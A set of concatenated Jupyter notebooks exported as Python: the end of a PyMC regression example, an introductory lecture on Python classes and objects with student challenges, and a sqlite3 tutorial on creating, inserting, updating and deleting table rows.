beta = pm.Normal('beta', 0, 10)
a = pm.Normal('a', 0, 10)
sd = pm.HalfNormal('sd', 5)
pm.Normal('y', X*beta+a, sd, observed=y)
logp_dlogp = m0.logp_dlogp_function([beta, a])
# -
logp_dlogp.set_extra_values({'sd_log__': np.log(1.)})
logp_dlogp.dict_to_array(dict(a=np.array(1.), beta=np.array(2.)))
logp_dlogp(np.asarray([2., 1.]))
bv = np.linspace(0., 1., 100)
av = np.linspace(1., 2., 100)
bv_, av_ = np.meshgrid(bv, av)
logvec = np.asarray([logp_dlogp(np.asarray([b, a]))[0]
for b, a in zip(bv_.flatten(), av_.flatten())])
ll = logvec.reshape(av_.shape)
plt.imshow(np.exp(ll), cmap='viridis');
# +
with pm.Model() as m0_:
beta = pm.Normal('beta', 0, 1)
a = pm.Normal('a', 0, 1)
sd = pm.HalfNormal('sd', 5)
pm.Normal('y', X*beta+a, sd, observed=y)
logp_dlogp = m0_.logp_dlogp_function([beta, a])
logp_dlogp.set_extra_values({'sd_log__': np.log(1.)})
logp_dlogp.dict_to_array(dict(a=np.array(1.), beta=np.array(2.)))
# +
logvec = np.asarray([logp_dlogp(np.asarray([b, a]))[0]
for b, a in zip(bv_.flatten(), av_.flatten())])
ll = logvec.reshape(av_.shape)
plt.imshow(np.exp(ll), cmap='viridis');
# -
|
Notebooks/Code4 - Linear_Regression.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# + [markdown] id="5UyFJYXOx-WH" slideshow={"slide_type": "slide"}
# # Lecture 12 - Classes and Objects (https://bit.ly/intro_python_12)
#
# * The basics of Python classes and objects:
# * Classes and Objects
# * The \__init__ constructor method
# * Object membership: Dot notation and classes
# * Everything is an object in Python!
# * Methods: adding functions to a class and the self argument
# * Object vs. class variables
# * Objects Mutability
# * Is vs. ==
# + [markdown] id="cMTiXTrGR1-y" slideshow={"slide_type": "slide"}
# # Object Oriented Programming (OOP)
#
# * As programs grow it is increasingly important to manage complexity, particularly to ensure that the state (all the variables and code) of the whole program are well organized.
#
# * We've seen **scope** rules and **modules** as ways of ensuring that **namespaces** don't become too complex.
# * e.g. ensuring that variables in one scope (e.g. a function) do not alter identically named variables in another scope.
# * Without these rules, we couldn't as easily reuse simple variable names like i, j, k across different bits of our program, because calling a function or importing a module might alter their value in unexpected ways.
#
# * In a non-OOP language like C, equivalents of modules and scope rules are all there are to manage complexity and avoid unexpected namespace collisions.
#
# * Python, however, is an OOP in which all elements of a program are "objects".
#
# * Objects are, loosely, a combination of functions and variables that allow you to create rich types.
#
# * Objects also provide "interfaces", ways of providing functionality abstracted from the exact means by which it is implemented. In this way we'll learn about the concepts of "polymorphism" and the related concept of "inheritance".
# + [markdown] id="RfH9iOJpKnV7" slideshow={"slide_type": "slide"}
# # Classes and Objects
#
# A Python object is defined by creating a class definition. This uses the keyword "class":
# + id="bLaJky0K3AD2" slideshow={"slide_type": "fragment"}
class Point:
    """ Point class represents and manipulates x,y coords. """ # we'll build on this idea
pass
# + [markdown] id="2WQDsWcnYsj1" slideshow={"slide_type": "fragment"}
# In general classes have the following syntax:
# + id="xF7knWJ4Yv-5" slideshow={"slide_type": "fragment"}
class NameOfClass: #(Pep 8 says use CamelCase for class names)
""" Docstring describing the class """ # Docstring, which is optional
# Class stuff
#other statements outside of the class
#(Python uses the same indented whitespace
#rules to define what belongs to a class)
# + [markdown] id="SN3z_BEa4BJx" slideshow={"slide_type": "fragment"}
# Much like the relationship between function definitions and function calls: **objects are instances of classes**, created as follows:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 551, "status": "ok", "timestamp": 1573601734179, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="W8PSnxc_3_m1" outputId="068ffba4-4ba7-40be-951f-d5e69c3849c6" slideshow={"slide_type": "fragment"}
p = Point() # Create an object of type Point,
# the general syntax is ClassName(arguments), where ClassName
# is the name of the class.
type(p) # p is now an object, an "instance of" class Point
# + [markdown] id="-5-Ukx1s4dYw" slideshow={"slide_type": "slide"}
# # \__init__()
#
# * Python Classes can contain functions, termed methods.
#
# * The first example of a method we'll see is \__init__.
#
# * \__init__ is the object's "constructor", it allows us to instantiate the object by adding variables to a class as follows:
# + executionInfo={"elapsed": 723, "status": "ok", "timestamp": 1607911577003, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="_jfs8HBnKrPQ" slideshow={"slide_type": "fragment"}
class Point:
""" Point class represents and manipulates x,y coords. """
def __init__(self, x=0, y=0):
""" Create a new point at the origin
This method will be called implicitly when we make a point object.
"""
self.x = x # The self argument to method represents the
# object, and allows you to assign stuff to the object
self.y = y
# + [markdown] id="tgUCAlkN-8w7" slideshow={"slide_type": "fragment"}
# * The key difference between a method and a function, apart from a method belonging to a class, is the first argument: **self**.
#
# * It is called "self" by convention - you could name it what you like (but don't! - call it self!)
#
# * self is a reference to the object itself. It is how we reference things belonging to the object, like variables.
# + [markdown] id="PLrrQ0uq6j00" slideshow={"slide_type": "subslide"}
# We can now create a Point object using much the same syntax we use for calling any function:
# + executionInfo={"elapsed": 836, "status": "ok", "timestamp": 1607901543656, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="dpAjByq22flF" slideshow={"slide_type": "fragment"}
p = Point(10, 11) # Make an object of type Point, this implicitly calls the __init__() method
                   # passing 10 as the x argument, and 11 as the y argument
# + [markdown] slideshow={"slide_type": "fragment"}
# To understand the implicit stuff happening:
# + slideshow={"slide_type": "fragment"}
# When you write "p = Point(10, 11)" this happens...
p = Point.__new__(Point) # Roughly, this allocates the memory for the p object and sets up the object
Point.__init__(p, 10, 11) # This then "instantiates" the variables, e.g. x and y
# + [markdown] id="n5JZwJmuLXSQ" slideshow={"slide_type": "slide"}
# # Object membership: Dot notation and classes
#
# To access the variables in a class
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 290, "status": "ok", "timestamp": 1573602204578, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="UsqoomyqK-Sp" outputId="8baee511-ea61-4156-8550-027df6259550" slideshow={"slide_type": "fragment"}
print(p.x, p.y) # This syntax has the form "object.attribute"
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 374, "status": "ok", "timestamp": 1573602222322, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="1ys_lhrmLgaK" outputId="6d236eb0-b3fa-4761-c0d7-7c808059a9b8" slideshow={"slide_type": "fragment"}
p.x = 5 # We can update the values of x and y by reassignment
p.y = 10
print(p.x, p.y)
# + [markdown] slideshow={"slide_type": "slide"}
# # Classes vs. Objects
#
# The following silly diagram illustrates the difference between a Class and Objects of that class:
#
# <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/6/62/CPT-OOP-objects_and_classes.svg/2560px-CPT-OOP-objects_and_classes.svg.png" width=800 height=400 />
#
# + slideshow={"slide_type": "subslide"}
# As the previous picture illustrates, we are free to make as many objects of a class as we like:
p = Point(10, 11) # p and q are distinct objects of the same class
q = Point(4, 2)
print("p.x", p.x, "p.y", p.y) # Different x and y values
print("q.x", q.x, "q.y", q.y)
print("Objects the same:", p == q) # Not the same object
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 1
# + slideshow={"slide_type": "fragment"}
# Write a class definition for a new class called "Vehicle".
# Add an __init__ method that takes a single argument "color" and
# sets the value as an attribute "color"
# This code should work:
v = Vehicle("purple")
print(v.color)
# + [markdown] slideshow={"slide_type": "slide"}
# # What is the type of p (and q)?
# + slideshow={"slide_type": "fragment"}
print(type(p))
print(type(q))
# + [markdown] slideshow={"slide_type": "fragment"}
# Which leads us to our next discovery...
# + [markdown] id="YZm69sZRRsQn" slideshow={"slide_type": "slide"}
# # Everything is an object in Python!!!!
#
# Before today we've seen lots of basic Python elements: ints, strings, floats, booleans, lists, tuples, etc.
#
# Every instance of these types is actually an object (mind blown!) and has a class (wow!) consider a string:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 348, "status": "ok", "timestamp": 1573602247980, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="HZqD5JoJ9ujf" outputId="42480de3-7a07-4921-cf12-a0a31f1415dc" slideshow={"slide_type": "fragment"}
type("hello")
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 434, "status": "ok", "timestamp": 1573602255762, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="ok0uTDxL-pBK" outputId="5679b7da-7bc0-48bd-80c8-7ed0704d5d44" slideshow={"slide_type": "fragment"}
"hello".__class__ # We can also use the __class__ variable of any object to find the "type" or
# class of the object, i.e. __class__ is an attribute on the object that refers to the class from
# which the object was created.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} executionInfo={"elapsed": 303, "status": "ok", "timestamp": 1573602268524, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="eglFDImz-akm" outputId="6d619a3f-28f2-4a56-b18f-359f043374ed" slideshow={"slide_type": "fragment"}
dir("hello")
# + [markdown] slideshow={"slide_type": "subslide"}
# What about the attributes of our point object, p?
# + colab={"base_uri": "https://localhost:8080/", "height": 507} executionInfo={"elapsed": 349, "status": "ok", "timestamp": 1573602304109, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="uq5KpijFAXrf" outputId="27b26598-d9ed-4e4a-92c6-9b6eead85a8d" slideshow={"slide_type": "fragment"}
dir(p)
# + [markdown] slideshow={"slide_type": "fragment"}
# Note that in addition to the x and y variables, p has many additional attributes, we'll learn about where those come from when we study inheritance.
# + [markdown] id="ZVH9QrmLL2OS" slideshow={"slide_type": "slide"}
# # Methods: Adding Functions to an object
#
# * The \__init__() we added was an instance of a **method**, a function belonging to an object.
#
# * We are free to add user defined methods:
#
# + id="DjkEz_2DMA4x" slideshow={"slide_type": "fragment"}
class Point:
""" Create a new Point, at coordinates x, y """
def __init__(self, x=0, y=0):
""" Create a new point at x, y """
self.x = x
self.y = y
def distance_from_origin(self): # We see the "self" argument again
""" Compute my distance from the origin """
return ((self.x ** 2) + (self.y ** 2)) ** 0.5 # This is just Pythagorus's theorem
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 419, "status": "ok", "timestamp": 1573602799832, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="Cs-_HBW-MZ8H" outputId="6a5229cb-a122-43f6-edce-7742366aab33" slideshow={"slide_type": "fragment"}
p = Point(3, 4)
p.distance_from_origin()
# + [markdown] id="47UIdaWFCOL6" slideshow={"slide_type": "fragment"}
# * Adding methods to a class definition is a natural way to group functionality (e.g. in this example, geometric functions) with variables (more generally state), (e.g. in this example, with coordinates).
#
# * To recap, the only major structural differences between a regular function and a method are:
# * The "self" argument
# * The use of dot notation to invoke the function
#
#
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 2
# + slideshow={"slide_type": "fragment"}
# Expand the Vehicle class you wrote in Challenge 1 by adding a method
# print_color, which prints the color of the Vehicle to the screen
# This code should work
v = Vehicle("purple")
v.print_color()
# + [markdown] id="c4kF3OFFI0eo" slideshow={"slide_type": "slide"}
# # Object vs. class variables
#
# As we said earlier, the variables defined in the constructor are unique
# to an object:
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 705, "status": "ok", "timestamp": 1607911746547, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="uT3atnUxLcYm" outputId="d08eca43-29fa-4b93-ef49-a878e06d87d8" slideshow={"slide_type": "fragment"}
p = Point(3, 4)
q = Point(10, 12) # Make a second point
print(p.x, p.y, q.x, q.y) # Each point object (p and q)
# has its own x and y
# + [markdown] id="UHWmQ4VzPRyF" slideshow={"slide_type": "subslide"}
# If you want to create a variable shared by all objects you can use a class variable:
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 720, "status": "ok", "timestamp": 1607911766447, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="EpGKO-ADPuKY" outputId="5ed91ed1-076e-4053-cc76-ebc45db744d7" slideshow={"slide_type": "fragment"}
class Point:
""" Create a new Point, at coordinates x, y """
# Class variables are defined outside of __init__ and are shared
# by all objects of the class
theta = 10
def __init__(self, x=0, y=0):
""" Create a new point at x, y """
self.x = x
self.y = y
# Etc.
p = Point(3, 4)
q = Point(9, 10)
print("Before", p.theta, q.theta)
Point.theta = 20 # There is only one theta, so we just
# changed the theta value for all Point objects - note the use of the class name
print("After", p.theta, q.theta)
# + [markdown] id="EHQ3hZWQQZvQ" slideshow={"slide_type": "fragment"}
# The benefit of class variables being shared is primarily memory - if you have something that is the same across all objects of a class, use a class variable.
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 763, "status": "ok", "timestamp": 1607911778698, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="60r39t4VyZSo" outputId="e47c398a-399f-43c6-dd3a-d3a9e189a773" slideshow={"slide_type": "subslide"}
# Note, this doesn't work the way you might expect:
p.theta = 5
print("Again", p.theta, q.theta)
# This is because assigning to p.theta creates a new instance variable that shadows
# the class variable for that object; it's those pesky scope rules again
print(Point.theta)
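# + [markdown]
# To undo the shadowing, delete the instance attribute with `del`; attribute lookup then falls back to the class variable. A self-contained sketch:

```python
class Point:
    theta = 10          # class variable shared by all instances

    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

p = Point()
p.theta = 5             # creates an instance attribute that shadows the class variable
print(p.theta)          # 5: the instance attribute wins

del p.theta             # remove the instance attribute...
print(p.theta)          # 10: ...and lookup falls back to the class variable
```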
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 3
# + slideshow={"slide_type": "fragment"}
# Redefine the Vehicle class from Challenges 1 and 2 to include a class variable "speed_limit" setting it to 100
# This code should work
v = Vehicle("purple")
v.print_color()
print(v.speed_limit)
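# + [markdown]
# One possible sketch of a solution (not the official answer; the `Vehicle` class from Challenges 1 and 2 is assumed to store a color and define `print_color`):

```python
class Vehicle:
    speed_limit = 100            # class variable shared by all vehicles

    def __init__(self, color):
        self.color = color       # instance variable, unique to each vehicle

    def print_color(self):
        print(self.color)

v = Vehicle("purple")
v.print_color()                  # purple
print(v.speed_limit)             # 100
```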
# + [markdown] id="xIC6Gf32QoXP" slideshow={"slide_type": "slide"}
# # Object Mutability
#
# Python objects are mutable.
# + colab={"base_uri": "https://localhost:8080/"} executionInfo={"elapsed": 792, "status": "ok", "timestamp": 1607911832561, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14Gh2rYrrH6yoNnUp0Oj4p4ouybc6ZcWGyPmKFtIY=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="MXyKWy2wKAL4" outputId="f286e558-3828-4b21-fe4d-e56afa6ead20" slideshow={"slide_type": "fragment"}
p = Point(5, 10)
p.x += 5 # You can directly modify variables
print(p.x)
# You can even add new variables to an object
p.new_variable = 1
print(p.new_variable)
# + colab={"base_uri": "https://localhost:8080/", "height": 219} executionInfo={"elapsed": 429, "status": "error", "timestamp": 1573603367495, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="F-iqtMhWKiwv" outputId="c53305fe-333b-4039-82b7-462c5f174cfc" slideshow={"slide_type": "fragment"}
# But note, this doesn't add a "new_variable" to other points
# you might have or create
q = Point(5, 10)
q.new_variable # This raises an AttributeError,
               # because you only added "new_variable" to p, not q
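# + [markdown]
# You can test for an attribute before using it with the built-in `hasattr`, or supply a default value with `getattr`, instead of triggering an AttributeError. A small sketch:

```python
class Point:
    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

p = Point(5, 10)
p.new_variable = 1                      # added to p only

q = Point(5, 10)
print(hasattr(p, "new_variable"))       # True
print(hasattr(q, "new_variable"))       # False
print(getattr(q, "new_variable", 0))    # 0: a default instead of an AttributeError
```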
# + [markdown] id="73mwHvO3LApm" slideshow={"slide_type": "subslide"}
# # Modifier Methods
#
# * In general, when changing an object, it is often helpful/cleaner to add "modifier" functions to change the underlying variables, e.g.:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 304, "status": "ok", "timestamp": 1573603551840, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="3X80Tbi8LBje" outputId="57b12dcc-ca2f-45f6-9dde-8f976e8ea79a" slideshow={"slide_type": "fragment"}
class Point:
""" Create a new Point, at coordinates x, y """
def __init__(self, x=0, y=0):
""" Create a new point at x, y """
self.x = x
self.y = y
def move(self, deltaX, deltaY):
""" Moves coordinates of point
( this is a modifier method, which you call to
change x and y)
"""
self.x += deltaX
self.y += deltaY
p = Point()
p.move(5, 10)
print(p.x, p.y)
# + [markdown] id="vBsLiWKcMQwl" slideshow={"slide_type": "fragment"}
# * Modifiers can be used to check changes make sense (using asserts or exceptions)
# * Modifiers can be used to create more abstract interfaces (avoiding direct variable access)
# * Sometimes however, modifiers can just be busy work - your mileage may vary
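# + [markdown]
# For instance, a modifier can use an assert to reject a change that doesn't make sense before it touches the object's state. A sketch reusing `Point` (the size limit is made up for illustration):

```python
class Point:
    def __init__(self, x=0, y=0):
        self.x = x
        self.y = y

    def move(self, deltaX, deltaY):
        """Modifier that checks the change makes sense before applying it."""
        assert abs(deltaX) <= 100 and abs(deltaY) <= 100, "move too large"
        self.x += deltaX
        self.y += deltaY

p = Point()
p.move(5, 10)       # a sensible move is applied
print(p.x, p.y)     # 5 10
try:
    p.move(1000, 0) # rejected by the assert; x and y are left unchanged
except AssertionError as e:
    print(e)        # move too large
```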
# + [markdown] slideshow={"slide_type": "subslide"}
# # Challenge 4
# + slideshow={"slide_type": "fragment"}
# Redefine the Vehicle class from Challenge 3 to include a modifier method "respray" that takes a color argument
# and sets the color variable
# This code should work
v = Vehicle("purple")
v.print_color()
v.respray("green")
v.print_color()
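# + [markdown]
# One possible sketch of a solution (not the official answer; the `Vehicle` class from Challenge 3 is assumed to have a color instance variable, a `print_color` method, and the `speed_limit` class variable):

```python
class Vehicle:
    speed_limit = 100

    def __init__(self, color):
        self.color = color

    def print_color(self):
        print(self.color)

    def respray(self, color):
        """Modifier method that sets the color variable."""
        self.color = color

v = Vehicle("purple")
v.print_color()     # purple
v.respray("green")
v.print_color()     # green
```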
# + [markdown] id="2Yuc8SctO79J" slideshow={"slide_type": "slide"}
# # Is vs. ==
#
# So far we have seen == as a way to test if two things are equal.
#
# We can also ask if they represent the exact same object (i.e. same instance of a class at a given location in computer memory)
# + id="ue4Ztfs-ZUVJ" slideshow={"slide_type": "fragment"}
x = 1
y = 1
x == y # Clearly, 1 == 1.
# Under the hood Python is testing whether the values x and y refer to are equivalent,
# even if they represent two separate instances in memory of the same thing.
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 309, "status": "ok", "timestamp": 1573603711820, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="mdbazTzkax-5" outputId="71ce5fef-5c5e-4555-b800-4fe05746d846" slideshow={"slide_type": "fragment"}
x is y # This is asking if x is referring to the same thing in memory as y.
# Python caches small integers, interned strings, etc. so that it doesn't duplicate
# memory storing the same thing twice; be careful about relying on this caching, though.
# Because numbers, strings and tuples are immutable this caching does not affect
# the behavior of the program.
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 527, "status": "ok", "timestamp": 1573604050290, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="OHfy_seEbg8a" outputId="e6cb8ce2-4897-4520-f1d2-d6874abfe631" slideshow={"slide_type": "subslide"}
x = [ 1 ]
y = [ 1 ]
x == y # The two lists are equivalent
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 320, "status": "ok", "timestamp": 1573603736185, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="TOg3FSdHbqGK" outputId="545d55e4-e49e-441b-eb79-5995b295e36e" slideshow={"slide_type": "fragment"}
x is y # But they are not the same instance in memory, why?
# + [markdown] id="lTFyhXRQbxvv" slideshow={"slide_type": "fragment"}
# If Python decided to cache x and y to the same list in memory then changes to x would affect y and vice versa, leading to odd behaviour, e.g.:
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 359, "status": "ok", "timestamp": 1573604056843, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="twR9Y5WXb8jt" outputId="f0f89ef2-aea6-4737-b46b-8af6645cc7cd" slideshow={"slide_type": "subslide"}
# Consider
x = [ 1 ]
y = [ 1 ]
x.append(2)
print(x, y) # The append to x did not affect y
# + colab={"base_uri": "https://localhost:8080/", "height": 34} executionInfo={"elapsed": 218, "status": "ok", "timestamp": 1573604067134, "user": {"displayName": "<NAME>", "photoUrl": "https://lh3.googleusercontent.com/a-/AAuE7mBMnWy8dDR7jyTHNy9tPaRx6DCyA3QKrIcuQ7R4=s64", "userId": "06399644931392855882"}, "user_tz": 480} id="QHgoxbZacbA0" outputId="88ec70d1-baf0-4dc3-e9a8-d5b97d9bacfc" slideshow={"slide_type": "fragment"}
# Now x is neither 'equal to' nor 'the same object as' y
x == y or x is y
# + id="FbPa8yo8ckPO" slideshow={"slide_type": "subslide"}
# But there is nothing stopping you making multiple references
# to the same list
x = [ 1 ]
y = x
x == y # Yep, true.
# + id="LgVluFpgcs61" slideshow={"slide_type": "fragment"}
x is y # Yep, also true.
y.append(2)
print(x)
# + [markdown] id="Y1jmDmUhcxyn" slideshow={"slide_type": "fragment"}
# The take home here:
# * == is for equivalence
# * 'is' is for testing if references point to the same thing in memory
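# + [markdown]
# Under the hood, `is` compares object identities, which you can inspect yourself with the built-in `id` function (in CPython, `id` returns the object's memory address). A quick sketch:

```python
x = [1]
y = [1]
z = x                        # a second name for the same list

print(x == y, x is y)        # True False: equivalent values, different objects
print(x == z, x is z)        # True True: two names, one object
print(id(x) == id(z))        # True: `is` is comparing identities like these
```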
# + [markdown] id="KZP9y5sgyVm8" slideshow={"slide_type": "slide"}
# # Reading
#
# * Open book Chapter 15: http://openbookproject.net/thinkcs/python/english3e/classes_and_objects_I.html
#
# * Open book Chapter 16:
# http://openbookproject.net/thinkcs/python/english3e/classes_and_objects_II.html
#
# # Homework
#
# * Go to Canvas and complete the lecture quiz, which involves completing each challenge problem
# * ZyBook Reading 12
#
|
lecture_notebooks/L12 Classes and Objects.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Table Creation and Insert Operation
# Example of creating a table and inserting rows with SQL.
import sqlite3
conn = sqlite3.connect('myTable.db')
cursor = conn.cursor()
sql_command = """CREATE TABLE emp(
staff_number INTEGER PRIMARY KEY,
fname VARCHAR(30),
lname VARCHAR(20),
gender CHAR(1),
joining DATE)"""
cursor.execute(sql_command)
sql_command = """INSERT INTO emp VALUES(18, 'Virat', 'Kohli', 'M', '1989-11-5')"""
cursor.execute(sql_command)
sql_command = """INSERT INTO emp VALUES(17, 'ABde', 'Villiares', 'M', '1985-17-2')"""
cursor.execute(sql_command)
conn.commit()
conn.close()
# Example of fetching data with SQL.
import sqlite3
conn = sqlite3.connect('myTable.db')
cursor = conn.cursor()
cursor.execute('SELECT * FROM emp')
ans = cursor.fetchall()
for i in ans:
print(i)
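# + [markdown]
# When a query depends on runtime values, use `?` placeholders rather than string formatting; sqlite3 then binds the values safely for you. A minimal sketch using an in-memory database (the table mirrors the `emp` example above):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cursor = conn.cursor()
cursor.execute("CREATE TABLE emp (staff_number INTEGER PRIMARY KEY, fname TEXT)")
cursor.execute("INSERT INTO emp VALUES (?, ?)", (18, "Virat"))

# The ? placeholder keeps user input out of the SQL string itself
name = "Virat"
row = cursor.execute(
    "SELECT staff_number FROM emp WHERE fname = ?", (name,)).fetchone()
print(row)    # (18,)
conn.close()
```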
# # Update and Delete Operation.
# Example of updating the table.
import sqlite3
conn = sqlite3.connect('myTable.db')
conn.execute("UPDATE emp SET fname = 'Sachin'")
conn.commit()
print(conn.total_changes)
cursor = conn.execute('SELECT * FROM emp')
for i in cursor:
print(i)
conn.close()
# Example of a delete operation.
import sqlite3
conn = sqlite3.connect('myTable.db')
conn.execute("DELETE from emp")
print(conn.total_changes)
conn.commit()
cursor = conn.execute('SELECT * FROM emp')
for i in cursor:
print(i)
conn.close()
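# + [markdown]
# A connection can also be used as a context manager: the `with` block commits on success and rolls back if the body raises an exception. Note that it does not close the connection for you. A small sketch:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp (fname TEXT)")

with conn:  # commits the transaction on success, rolls back on error
    conn.execute("INSERT INTO emp VALUES (?)", ("Sachin",))

rows = conn.execute("SELECT fname FROM emp").fetchall()
print(rows)     # [('Sachin',)]
conn.close()    # the with-block does not close the connection; do it yourself
```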
# +
# code for executing query using input data
import sqlite3
con = sqlite3.connect(":memory:")
cur = con.cursor()
cur.execute("create table person (name, age, id)")
print ("Enter 5 students names:")
who = [input() for i in range(5)]
print ("Enter their ages respectively:")
age = [int(input()) for i in range(5)]
print ("Enter their ids respectively:")
p_id = [int(input()) for i in range(5)]
n = len(who)
for i in range(n):
cur.execute("insert into person values (?, ?, ?)", (who[i], age[i], p_id[i]))
cur.execute("select * from person")
print(cur.fetchall())
# -
#Visualizing the data.
import matplotlib.pyplot as plt
def pl(p_id, age):
plt.scatter(p_id, age, color = 'blue', marker = '*')
plt.xlabel('Persons ID')
plt.ylabel('Age')
plt.title('Scatter Plot')
plt.show()
print('Enter 5 students names:')
who = [input() for _ in range(5)]
print('Enter the respective Age:')
age = [int(input()) for i in range(5)]
print('Enter ids:')
p_id = [int(input()) for j in range(5)]
pl(p_id, age)
# # Handling Large Data
# +
import sqlite3
# Connection with the DataBase
# 'library.db'
connection = sqlite3.connect("library.db")
cursor = connection.cursor()
# SQL piece of code Executed
cursor.executescript("""
CREATE TABLE peoplesSSSSS(
firstname,
lastname,
age
);
CREATE TABLE booksSSSS(
title,
author,
published
);
INSERT INTO
booksSSSS(title, author, published)
VALUES (
'<NAME>''s GFG Detective Agency',
'<NAME>',
1987
);
""")
sql = """
SELECT COUNT(*) FROM booksSSSS;"""
cursor.execute(sql)
# The output is fetched and returned
# as a list by fetchall()
result = cursor.fetchall()
print(result)
sql = """
SELECT * FROM booksSSSS;"""
cursor.execute(sql)
result = cursor.fetchall()
print(result)
# Changes saved into database
